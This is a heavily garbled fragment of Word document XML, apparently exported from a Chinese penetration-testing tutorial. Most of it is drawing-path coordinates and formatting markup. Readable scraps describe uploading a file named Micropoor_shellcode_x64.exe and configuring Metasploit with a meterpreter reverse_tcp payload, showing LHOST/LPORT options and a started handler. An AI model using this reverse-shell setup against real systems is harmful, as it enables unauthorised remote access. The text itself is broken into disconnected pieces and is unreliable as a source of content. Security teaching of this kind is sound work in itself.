4856,15447,4856,15451,4856,15455,4856,15459,4856,15464,4856,15468,4856,15473,4856,15477,4856,15482,4856,15487,4856,15492,4856,15497,4856,15502,4856,15507,4856,15513,4856,15518,4856,15524,4856,15529,4856,15535,4856,15541,4856,15547,4856,15553,4856,15559,4856,15565,4856,15572,4856,15572,4856,15572,4856,15572,4856,15572,4856,15572,4856,15572,4856,15572,4856,15572,4856,15572,4856,15572,4856,15572,4856,15572,4856,15572,4856,15572,4856,15572,4856,15572,4856,15572,4856,15572,4856,15572,4856,15572,4856,15572,4856,15572,4856,15572,4856,15572,4855,15572,4855,15572,4855,15572,4855,15572,4855,15572,4855,15572,4855,15572,4854,15572,4854,15572,4854,15572,4854,15572,4853,15572,4853,15572,4853,15572,4853,15572,4852,15572,4852,15572,4852,15572,4851,15572,4851,15572,4850,15572,4850,15572,4850,15572,4849,15572,4849,15572,4848,15572,4848,15572,4847,15572,4846,15572,4846,15572,4845,15572,4845,15572,4844,15572,4843,15572,4843,15572,4842,15572,4841,15572,4840,15572,4839,15572,4839,15572,4838,15572,4837,15572,4836,15572,4835,15572,4834,15572,4833,15572,4832,15572,4831,15572,4830,15572,4829,15572,4828,15572,4826,15572,4825,15572,4824,15572,4823,15572,4821,15572,4820,15572,4819,15572,4817,15572,4816,15572,4814,15572,4813,15572,4811,15572,4810,15572,4808,15572,4806,15572,4805,15572,4803,15572,4801,15572,4799,15572,4797,15572,4795,15572,4793,15572,4791,15572,4789,15572,4787,15572,4785,15572,4783,15572,4781,15572,4779,15572,4776,15572,4774,15572,4772,15572,4769,15572,4767,15572,4764,15572,4762,15572,4759,15572,4756,15572,4754,15572,4751,15572,4748,15572,4745,15572,4742,15572,4739,15572,4736,15572,4736,15572,4736,15572,4736,15572,4736,15572,4736,15572,4736,15572,4736,15572,4736,15572,4736,15572,4736,15572,4736,15572,4736,15572,4736,15572,4736,15572,4736,15571,4736,15571,4736,15571,4736,15571,4736,15571,4736,15571,4736,15571,4736,15570,4736,15570,4736,15570,4736,15570,4736,15569,4736,15569,4736,15569,4736,15569,4736,15568,4736,15568,4736,15567,4736,15567,4736,15566,4736,15566,4736,15565,4736,15565,4736,15564,4736,15564,4736,15563,4736,15562,4736,15561,4736,15561,4736,15560,4736,15559,4736,15558,4736,15557,4736,15556,4736,15555,4736,15554,4736,15553,4736,15552,4736,15551,4736,15549,4736,15548,4736,15547,4736,15545,4736,15544,4736,15542,4736,15541,4736,15539,4736,15537,4736,15536,4736,15534,4736,15532,4736,15530,4736,15528,4736,15526,4736,15524,4736,15522,4736,15520,4736,15518,4736,15515,4736,15513,4736,15510,4736,15508,4736,15505,4736,15503,4736,15500,4736,15497,4736,15494,4736,15491,4736,15488,4736,15485,4736,15482,4736,15479,4736,15476,4736,15472,4736,15469,4736,15465,4736,15461,4736,15458,4736,15454,4736,15450,4736,15446,4736,15442,4736,15438,4736,15434,4736,15429,4736,15425,4736,15420,4736,15416,4736,15411,4736,15406,4736,15402,4736,15397,4736,15392,4736,15386,4736,15381,4736,15376,4736,15370,4736,15365,4736,15359,4736,15353,4736,15348,4736,15342,4736,15336,4736,15329,4736,15323,4736,15317e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:271.500pt;margin-top:764.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5430,15290" coordsize="130,270">
        <v:shape style="position:absolute;left:5430;top:15290;width:130;height:270" coordorigin="5430,15290" coordsize="130,270" path="m5457,15317l5457,15317,5457,15317,5457,15317,5457,15317,5457,15317,5457,15317,5457,15317,5457,15317,5457,15317,5457,15317,5457,15317,5457,15317,5457,15317,5457,15317,5457,15317,5457,15317,5457,15317,5457,15317,5457,15317,5457,15317,5457,15317,5457,15317,5458,15317,5458,15317,5458,15317,5458,15317,5458,15317,5458,15317,5458,15317,5458,15317,5459,15317,5459,15317,5459,15317,5459,15317,5460,15317,5460,15317,5460,15317,5460,15317,5461,15317,5461,15317,5461,15317,5462,15317,5462,15317,5462,15317,5463,15317,5463,15317,5464,15317,5464,15317,5465,15317,5465,15317,5466,15317,5466,15317,5467,15317,5467,15317,5468,15317,5469,15317,5469,15317,5470,15317,5471,15317,5471,15317,5472,15317,5473,15317,5474,15317,5475,15317,5475,15317,5476,15317,5477,15317,5478,15317,5479,15317,5480,15317,5481,15317,5482,15317,5483,15317,5484,15317,5486,15317,5487,15317,5488,15317,5489,15317,5491,15317,5492,15317,5493,15317,5495,15317,5496,15317,5497,15317,5499,15317,5501,15317,5502,15317,5504,15317,5505,15317,5507,15317,5509,15317,5510,15317,5512,15317,5514,15317,5516,15317,5518,15317,5520,15317,5522,15317,5524,15317,5526,15317,5528,15317,5530,15317,5532,15317,5535,15317,5537,15317,5539,15317,5542,15317,5544,15317,5546,15317,5549,15317,5552,15317,5554,15317,5557,15317,5560,15317,5562,15317,5565,15317,5568,15317,5571,15317,5574,15317,5577,15317,5577,15317,5577,15317,5577,15317,5577,15317,5577,15317,5577,15317,5577,15317,5577,15317,5577,15317,5577,15317,5577,15317,5577,15317,5577,15317,5577,15317,5577,15317,5577,15317,5577,15317,5577,15317,5577,15318,5577,15318,5577,15318,5577,15318,5577,15318,5577,15319,5577,15319,5577,15319,5577,15319,5577,15320,5577,15320,5577,15320,5577,15321,5577,15321,5577,15322,5577,15322,5577,15323,5577,15323,5577,15324,5577,15324,5577,15325,5577,15326,5577,15326,5577,15327,5577,15328,5577,15329,5577,15330,5577,15331,5577,15331,5577,15332,5577,15333,5577,15335,5577,15336,5577,15337,5577,15338,5577,15339,5577,15341,5577,15342,5577,15343,5577,15345,5577,15346,5577,15348,5577,15349,5577,15351,5577,15353,5577,15355,5577,15356,5577,15358,5577,15360,5577,15362,5577,15364,5577,15366,5577,15369,5577,15371,5577,15373,5577,15376,5577,15378,5577,15381,5577,15383,5577,15386,5577,15389,5577,15391,5577,15394,5577,15397,5577,15400,5577,15403,5577,15406,5577,15410,5577,15413,5577,15416,5577,15420,5577,15423,5577,15427,5577,15431,5577,15435,5577,15438,5577,15442,5577,15447,5577,15451,5577,15455,5577,15459,5577,15464,5577,15468,5577,15473,5577,15477,5577,15482,5577,15487,5577,15492,5577,15497,5577,15502,5577,15507,5577,15513,5577,15518,5577,15524,5577,15529,5577,15535,5577,15541,5577,15547,5577,15553,5577,15559,5577,15565,5577,15572,5577,15572,5577,15572,5577,15572,5577,15572,5577,15572,5577,15572,5577,15572,5577,15572,5577,15572,5577,15572,5577,15572,5577,15572,5577,15572,5577,15572,5577,15572,5577,15572,5577,15572,5576,15572,5576,15572,5576,15572,5576,15572,5576,15572,5576,15572,5576,15572,5576,15572,5576,15572,5576,15572,5575,15572,5575,15572,5575,15572,5575,15572,5575,15572,5574,15572,5574,15572,5574,15572,5574,15572,5573,15572,5573,15572,5573,15572,5573,15572,5572,15572,5572,15572,5572,15572,5571,15572,5571,15572,5570,15572,5570,15572,5569,15572,5569,15572,5568,15572,5568,15572,5567,15572,5567,15572,5566,15572,5566,15572,5565,15572,5564,15572,5564,15572,5563,15572,5562,15572,5561,15572,5561,15572,5560,15572,5559,15572,5558,15572,5557,15572,5556,15572,5555,15572,5554,15572,5553,15572,5552,15572,5551,15572,5550,15572,5549,15572,5548,15572,5547,15572,5546,15572,5544,15572,5543,15572,5542,15572,5540,15572,5539,15572,5538,15572,5536,15572,5535,15572,5533,15572,5531,15572,5530,15572,5528,15572,5527,15572,5525,15572,5523,15572,5521,15572,5520,15572,5518,15572,5516,15572,5514,15572,5512,15572,5510,15572,5508,15572,5506,15572,5503,15572,5501,15572,5499,15572,5497,15572,5494,15572,5492,15572,5490,15572,5487,15572,5485,15572,5482,15572,5479,15572,5477,15572,5474,15572,5471,15572,5468,15572,5466,15572,5463,15572,5460,15572,5457,15572,5457,15572,5457,15572,5457,15572,5457,15572,5457,15572,5457,15572,5457,15572,5457,15572,5457,15572,5457,15572,5457,15572,5457,15572,5457,15572,5457,15572,5457,15571,5457,15571,5457,15571,5457,15571,5457,15571,5457,15571,5457,15571,5457,15570,5457,15570,5457,15570,5457,15570,5457,15569,5457,15569,5457,15569,5457,15569,5457,15568,5457,15568,5457,15567,5457,15567,5457,15566,5457,15566,5457,15565,5457,15565,5457,15564,5457,15564,5457,15563,5457,15562,5457,15561,5457,15561,5457,15560,5457,15559,5457,15558,5457,15557,5457,15556,5457,15555,5457,15554,5457,15553,5457,15552,5457,15551,5457,15549,5457,15548,5457,15547,5457,15545,5457,15544,5457,15542,5457,15541,5457,15539,5457,15537,5457,15536,5457,15534,5457,15532,5457,15530,5457,15528,5457,15526,5457,15524,5457,15522,5457,15520,5457,15518,5457,15515,5457,15513,5457,15510,5457,15508,5457,15505,5457,15503,5457,15500,5457,15497,5457,15494,5457,15491,5457,15488,5457,15485,5457,15482,5457,15479,5457,15476,5457,15472,5457,15469,5457,15465,5457,15461,5457,15458,5457,15454,5457,15450,5457,15446,5457,15442,5457,15438,5457,15434,5457,15429,5457,15425,5457,15420,5457,15416,5457,15411,5457,15406,5457,15402,5457,15397,5457,15392,5457,15386,5457,15381,5457,15376,5457,15370,5457,15365,5457,15359,5457,15353,5457,15348,5457,15342,5457,15336,5457,15329,5457,15323,5457,1531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上传Micropoor_shellco</w:t>
      </w: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de_x64.exe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配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置msf：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use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set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payload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rever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se_t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cp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payload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meterpreter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reverse_tcp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491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show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Module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521.237pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,10424">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:10424" coordorigin="10402,0" coordsize="0,10424" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,4,10402,6,10402,8,10402,10,10402,13,10402,16,10402,20,10402,25,10402,30,10402,36,10402,42,10402,49,10402,57,10402,65,10402,75,10402,85,10402,96,10402,108,10402,121,10402,135,10402,150,10402,167,10402,184,10402,202,10402,222,10402,243,10402,265,10402,288,10402,313,10402,339,10402,366,10402,395,10402,426,10402,458,10402,491,10402,526,10402,563,10402,602,10402,642,10402,684,10402,727,10402,773,10402,820,10402,869,10402,920,10402,974,10402,1029,10402,1086,10402,1145,10402,1207,10402,1270,10402,1336,10402,1404,10402,1474,10402,1546,10402,1621,10402,1698,10402,1778,10402,1860,10402,1945,10402,2032,10402,2121,10402,2214,10402,2308,10402,2406,10402,2506,10402,2609,10402,2715,10402,2824,10402,2935,10402,3050,10402,3167,10402,3287,10402,3410,10402,3537,10402,3666,10402,3799,10402,3934,10402,4073,10402,4215,10402,4361,10402,4509,10402,4661,10402,4817,10402,4975,10402,5138,10402,5303,10402,5473,10402,5645,10402,5822,10402,6002,10402,6186,10402,6373,10402,6564,10402,6759,10402,6958,10402,7161,10402,7367,10402,7578,10402,7792,10402,8011,10402,8233,10402,8460,10402,8691,10402,8926,10402,9165,10402,9408,10402,9656,10402,9907,10402,10164,10402,10424e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:49.200pt;width:451.800pt;height:474.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-1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7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4791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10</w:t>
      </w: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11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="124" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="326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Payload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options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reverse_tcp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13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2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Current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Setting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Required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EXITFUNC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process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Exit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technique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Accepted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="98989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''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seh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thread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ss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none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LHOST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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.4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listen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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>an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interface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may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be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specifi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2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="156" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="6261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1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LPORT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yes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1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listen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="2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port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19</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="25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20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7942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target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13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Id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="1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13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16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7582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Wildcard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Target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26</w:t>
      </w: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27</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="124" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="542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29</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="43" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="386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Started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.4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31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521.236pt;width:0.0pt;height:320.763pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,10424" coordsize="0,6415">
        <v:shape style="position:absolute;left:10402;top:10424;width:0;height:6415" coordorigin="10402,10424" coordsize="0,6415" path="m10402,10424l10402,10424,10402,10424,10402,10424,10402,10424,10402,10424,10402,10425,10402,10425,10402,10426,10402,10426,10402,10427,10402,10428,10402,10429,10402,10431,10402,10433,10402,10435,10402,10437,10402,10440,10402,10443,10402,10446,10402,10450,10402,10455,10402,10459,10402,10465,10402,10471,10402,10477,10402,10484,10402,10491,10402,10499,10402,10508,10402,10517,10402,10527,10402,10538,10402,10549,10402,10561,10402,10574,10402,10587,10402,10602,10402,10617,10402,10633,10402,10650,10402,10668,10402,10687,10402,10706,10402,10727,10402,10749,10402,10771,10402,10795,10402,10819,10402,10845,10402,10872,10402,10900,10402,10929,10402,10960,10402,10991,10402,11024,10402,11058,10402,11093,10402,11129,10402,11167,10402,11206,10402,11247,10402,11288,10402,11332,10402,11376,10402,11422,10402,11470,10402,11519,10402,11569,10402,11621,10402,11675,10402,11730,10402,11787,10402,11845,10402,11905,10402,11967,10402,12030,10402,12095,10402,12162,10402,12231,10402,12301,10402,12373,10402,12447,10402,12523,10402,12601,10402,12681,10402,12762,10402,12846,10402,12931,10402,13019,10402,13108,10402,13199,10402,13293,10402,13389,10402,13486,10402,13586,10402,13688,10402,13792,10402,13899,10402,14007,10402,14118,10402,14231,10402,14347,10402,14464,10402,14584,10402,14707,10402,14831,10402,14958,10402,15088,10402,15220,10402,15354,10402,15491,10402,15631,10402,15773,10402,15917,10402,16064,10402,16214,10402,16366,10402,16521,10402,16679,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:520.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,10410" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:10410;width:8990;height:390" coordorigin="1490,10410" coordsize="8990,390" path="m1510,10424l1510,10424,1510,10424,1510,10424,1510,10424,1510,10424,1510,10424,1511,10424,1512,10424,1512,10424,1514,10424,1515,10424,1517,10424,1519,10424,1521,10424,1524,10424,1528,10424,1532,10424,1536,10424,1541,10424,1546,10424,1552,10424,1559,10424,1566,10424,1575,10424,1583,10424,1593,10424,1603,10424,1615,10424,1627,10424,1640,10424,1654,10424,1668,10424,1684,10424,1701,10424,1719,10424,1738,10424,1758,10424,1780,10424,1802,10424,1826,10424,1851,10424,1877,10424,1904,10424,1933,10424,1963,10424,1995,10424,2028,10424,2063,10424,2099,10424,2136,10424,2175,10424,2216,10424,2259,10424,2303,10424,2348,10424,2396,10424,2445,10424,2496,10424,2549,10424,2604,10424,2660,10424,2719,10424,2779,10424,2841,10424,2906,10424,2972,10424,3041,10424,3112,10424,3184,10424,3259,10424,3336,10424,3416,10424,3498,10424,3582,10424,3668,10424,3757,10424,3848,10424,3941,10424,4037,10424,4136,10424,4236,10424,4340,10424,4446,10424,4555,10424,4666,10424,4780,10424,4897,10424,5017,10424,5139,10424,5264,10424,5392,10424,5523,10424,5657,10424,5793,10424,5933,10424,6076,10424,6222,10424,6370,10424,6522,10424,6677,10424,6835,10424,6997,10424,7161,10424,7329,10424,7500,10424,7675,10424,7853,10424,8034,10424,8219,10424,8407,10424,8598,10424,8793,10424,8992,10424,9194,10424,9400,10424,9609,10424,9823,10424,10039,10424,10260,10424,10484,10424,10484,10424,10484,10424,10484,10424,10484,10424,10484,10424,10484,10424,10484,10424,10484,10424,10484,10424,10484,10424,10484,10424,10484,10425,10484,10425,10484,10425,10484,10425,10484,10425,10484,10425,10484,10425,10484,10426,10484,10426,10484,10426,10484,10426,10484,10427,10484,10427,10484,10427,10484,10428,10484,10428,10484,10429,10484,10429,10484,10430,10484,10430,10484,10431,10484,10432,10484,10433,10484,10433,10484,10434,10484,10435,10484,10436,10484,10437,10484,10438,10484,10439,10484,10440,10484,10441,10484,10443,10484,10444,10484,10445,10484,10447,10484,10448,10484,10450,10484,10451,10484,10453,10484,10455,10484,10457,10484,10459,10484,10461,10484,10463,10484,10465,10484,10467,10484,10469,10484,10472,10484,10474,10484,10477,10484,10479,10484,10482,10484,10485,10484,10488,10484,10491,10484,10494,10484,10497,10484,10500,10484,10504,10484,10507,10484,10511,10484,10514,10484,10518,10484,10522,10484,10526,10484,10530,10484,10534,10484,10538,10484,10543,10484,10547,10484,10552,10484,10557,10484,10561,10484,10566,10484,10572,10484,10577,10484,10582,10484,10587,10484,10593,10484,10599,10484,10605,10484,10610,10484,10617,10484,10623,10484,10629,10484,10636,10484,10642,10484,10649,10484,10656,10484,10663,10484,10670,10484,10677,10484,10685,10484,10692,10484,10700,10484,10708,10484,10716,10484,10724,10484,10732,10484,10741,10484,10750,10484,10758,10484,10767,10484,10776,10484,10786,10484,10795,10484,10805,10484,10814,10484,10814,10484,10814,10484,10814,10484,10814,10484,10814,10484,10814,10483,10814,10482,10814,10482,10814,10480,10814,10479,10814,10477,10814,10475,10814,10473,10814,10470,10814,10466,10814,10462,10814,10458,10814,10453,10814,10448,10814,10442,10814,10435,10814,10428,10814,10419,10814,10411,10814,10401,10814,10391,10814,10379,10814,10367,10814,10354,10814,10340,10814,10326,10814,10310,10814,10293,10814,10275,10814,10256,10814,10236,10814,10215,10814,10192,10814,10168,10814,10143,10814,10117,10814,10090,10814,10061,10814,10031,10814,9999,10814,9966,10814,9931,10814,9895,10814,9858,10814,9819,10814,9778,10814,9735,10814,9691,10814,9646,10814,9598,10814,9549,10814,9498,10814,9445,10814,9391,10814,9334,10814,9275,10814,9215,10814,9153,10814,9088,10814,9022,10814,8953,10814,8883,10814,8810,10814,8735,10814,8658,10814,8578,10814,8497,10814,8413,10814,8326,10814,8238,10814,8146,10814,8053,10814,7957,10814,7859,10814,7758,10814,7654,10814,7548,10814,7439,10814,7328,10814,7214,10814,7097,10814,6977,10814,6855,10814,6730,10814,6602,10814,6471,10814,6337,10814,6201,10814,6061,10814,5918,10814,5773,10814,5624,10814,5472,10814,5317,10814,5159,10814,4997,10814,4833,10814,4665,10814,4494,10814,4319,10814,4141,10814,3960,10814,3776,10814,3587,10814,3396,10814,3201,10814,3002,10814,2800,10814,2594,10814,2385,10814,2172,10814,1955,10814,1734,10814,1510,10814,1510,10814,1510,10814,1510,10814,1510,10814,1510,10814,1510,10814,1510,10814,1510,10814,1510,10814,1510,10814,1510,10814,1510,10814,1510,10814,1510,10814,1510,10814,1510,10814,1510,10813,1510,10813,1510,10813,1510,10813,1510,10813,1510,10812,1510,10812,1510,10812,1510,10811,1510,10811,1510,10810,1510,10810,1510,10809,1510,10809,1510,10808,1510,10808,1510,10807,1510,10806,1510,10805,1510,10805,1510,10804,1510,10803,1510,10802,1510,10801,1510,10800,1510,10798,1510,10797,1510,10796,1510,10795,1510,10793,1510,10792,1510,10790,1510,10789,1510,10787,1510,10785,1510,10784,1510,10782,1510,10780,1510,10778,1510,10776,1510,10774,1510,10772,1510,10769,1510,10767,1510,10764,1510,10762,1510,10759,1510,10757,1510,10754,1510,10751,1510,10748,1510,10745,1510,10742,1510,10738,1510,10735,1510,10732,1510,10728,1510,10724,1510,10721,1510,10717,1510,10713,1510,10709,1510,10705,1510,10700,1510,10696,1510,10691,1510,10687,1510,10682,1510,10677,1510,10672,1510,10667,1510,10662,1510,10657,1510,10651,1510,10646,1510,10640,1510,10634,1510,10628,1510,10622,1510,10616,1510,10610,1510,10603,1510,10597,1510,10590,1510,10583,1510,10576,1510,10569,1510,10561,1510,10554,1510,10546,1510,10539,1510,10531,1510,10523,1510,10515,1510,10506,1510,10498,1510,10489,1510,10480,1510,10471,1510,10462,1510,10453,1510,10444,1510,10434,1510,10424e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:519.600pt;width:445.800pt;height:21.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId22" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:539.500pt;width:449.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,10790" coordsize="8990,350">
        <v:shape style="position:absolute;left:1490;top:10790;width:8990;height:350" coordorigin="1490,10790" coordsize="8990,350" path="m1510,10814l1510,10814,1510,10814,1510,10814,1510,10814,1510,10814,1510,10814,1511,10814,1512,10814,1512,10814,1514,10814,1515,10814,1517,10814,1519,10814,1521,10814,1524,10814,1528,10814,1532,10814,1536,10814,1541,10814,1546,10814,1552,10814,1559,10814,1566,10814,1575,10814,1583,10814,1593,10814,1603,10814,1615,10814,1627,10814,1640,10814,1654,10814,1668,10814,1684,10814,1701,10814,1719,10814,1738,10814,1758,10814,1780,10814,1802,10814,1826,10814,1851,10814,1877,10814,1904,10814,1933,10814,1963,10814,1995,10814,2028,10814,2063,10814,2099,10814,2136,10814,2175,10814,2216,10814,2259,10814,2303,10814,2348,10814,2396,10814,2445,10814,2496,10814,2549,10814,2604,10814,2660,10814,2719,10814,2779,10814,2841,10814,2906,10814,2972,10814,3041,10814,3112,10814,3184,10814,3259,10814,3336,10814,3416,10814,3498,10814,3582,10814,3668,10814,3757,10814,3848,10814,3941,10814,4037,10814,4136,10814,4236,10814,4340,10814,4446,10814,4555,10814,4666,10814,4780,10814,4897,10814,5017,10814,5139,10814,5264,10814,5392,10814,5523,10814,5657,10814,5793,10814,5933,10814,6076,10814,6222,10814,6370,10814,6522,10814,6677,10814,6835,10814,6997,10814,7161,10814,7329,10814,7500,10814,7675,10814,7853,10814,8034,10814,8219,10814,8407,10814,8598,10814,8793,10814,8992,10814,9194,10814,9400,10814,9609,10814,9823,10814,10039,10814,10260,10814,10484,10814,10484,10814,10484,10814,10484,10814,10484,10814,10484,10814,10484,10814,10484,10814,10484,10815,10484,10815,10484,10815,10484,10815,10484,10815,10484,10815,10484,10815,10484,10815,10484,10815,10484,10815,10484,10815,10484,10816,10484,10816,10484,10816,10484,10816,10484,10817,10484,10817,10484,10817,10484,10818,10484,10818,10484,10818,10484,10819,10484,10819,10484,10820,10484,10820,10484,10821,10484,10821,10484,10822,10484,10823,10484,10824,10484,10824,10484,10825,10484,10826,10484,10827,10484,10828,10484,10829,10484,10830,10484,10831,10484,10832,10484,10834,10484,10835,10484,10836,10484,10837,10484,10839,10484,10840,10484,10842,10484,10844,10484,10845,10484,10847,10484,10849,10484,10851,10484,10853,10484,10855,10484,10857,10484,10859,10484,10861,10484,10863,10484,10866,10484,10868,10484,10871,10484,10873,10484,10876,10484,10879,10484,10882,10484,10885,10484,10888,10484,10891,10484,10894,10484,10897,10484,10900,10484,10904,10484,10907,10484,10911,10484,10915,10484,10919,10484,10922,10484,10926,10484,10931,10484,10935,10484,10939,10484,10943,10484,10948,10484,10953,10484,10957,10484,10962,10484,10967,10484,10972,10484,10977,10484,10982,10484,10988,10484,10993,10484,10999,10484,11005,10484,11010,10484,11016,10484,11022,10484,11029,10484,11035,10484,11041,10484,11048,10484,11054,10484,11061,10484,11068,10484,11075,10484,11082,10484,11090,10484,11097,10484,11105,10484,11112,10484,11120,10484,11128,10484,11136,10484,11145,10484,11145,10484,11145,10484,11145,10484,11145,10484,11145,10484,11145,10483,11145,10482,11145,10482,11145,10480,11145,10479,11145,10477,11145,10475,11145,10473,11145,10470,11145,10466,11145,10462,11145,10458,11145,10453,11145,10448,11145,10442,11145,10435,11145,10428,11145,10419,11145,10411,11145,10401,11145,10391,11145,10379,11145,10367,11145,10354,11145,10340,11145,10326,11145,10310,11145,10293,11145,10275,11145,10256,11145,10236,11145,10215,11145,10192,11145,10168,11145,10143,11145,10117,11145,10090,11145,10061,11145,10031,11145,9999,11145,9966,11145,9931,11145,9895,11145,9858,11145,9819,11145,9778,11145,9735,11145,9691,11145,9646,11145,9598,11145,9549,11145,9498,11145,9445,11145,9391,11145,9334,11145,9275,11145,9215,11145,9153,11145,9088,11145,9022,11145,8953,11145,8883,11145,8810,11145,8735,11145,8658,11145,8578,11145,8497,11145,8413,11145,8326,11145,8238,11145,8146,11145,8053,11145,7957,11145,7859,11145,7758,11145,7654,11145,7548,11145,7439,11145,7328,11145,7214,11145,7097,11145,6977,11145,6855,11145,6730,11145,6602,11145,6471,11145,6337,11145,6201,11145,6061,11145,5918,11145,5773,11145,5624,11145,5472,11145,5317,11145,5159,11145,4997,11145,4833,11145,4665,11145,4494,11145,4319,11145,4141,11145,3960,11145,3776,11145,3587,11145,3396,11145,3201,11145,3002,11145,2800,11145,2594,11145,2385,11145,2172,11145,1955,11145,1734,11145,1510,11145,1510,11145,1510,11145,1510,11145,1510,11145,1510,11145,1510,11145,1510,11145,1510,11145,1510,11145,1510,11144,1510,11144,1510,11144,1510,11144,1510,11144,1510,11144,1510,11144,1510,11144,1510,11144,1510,11143,1510,11143,1510,11143,1510,11143,1510,11143,1510,11142,1510,11142,1510,11142,1510,11141,1510,11141,1510,11140,1510,11140,1510,11139,1510,11139,1510,11138,1510,11138,1510,11137,1510,11136,1510,11135,1510,11135,1510,11134,1510,11133,1510,11132,1510,11131,1510,11130,1510,11129,1510,11128,1510,11127,1510,11126,1510,11124,1510,11123,1510,11122,1510,11120,1510,11119,1510,11117,1510,11115,1510,11114,1510,11112,1510,11110,1510,11108,1510,11106,1510,11104,1510,11102,1510,11100,1510,11098,1510,11096,1510,11093,1510,11091,1510,11088,1510,11086,1510,11083,1510,11080,1510,11077,1510,11074,1510,11071,1510,11068,1510,11065,1510,11062,1510,11059,1510,11055,1510,11052,1510,11048,1510,11044,1510,11040,1510,11037,1510,11033,1510,11028,1510,11024,1510,11020,1510,11016,1510,11011,1510,11006,1510,11002,1510,10997,1510,10992,1510,10987,1510,10982,1510,10977,1510,10971,1510,10966,1510,10960,1510,10954,1510,10949,1510,10943,1510,10937,1510,10931,1510,10924,1510,10918,1510,10911,1510,10905,1510,10898,1510,10891,1510,10884,1510,10877,1510,10869,1510,10862,1510,10854,1510,10847,1510,10839,1510,10831,1510,10823,1510,10814e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:540.500pt;width:1.500pt;height:16.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,10810" coordsize="30,330">
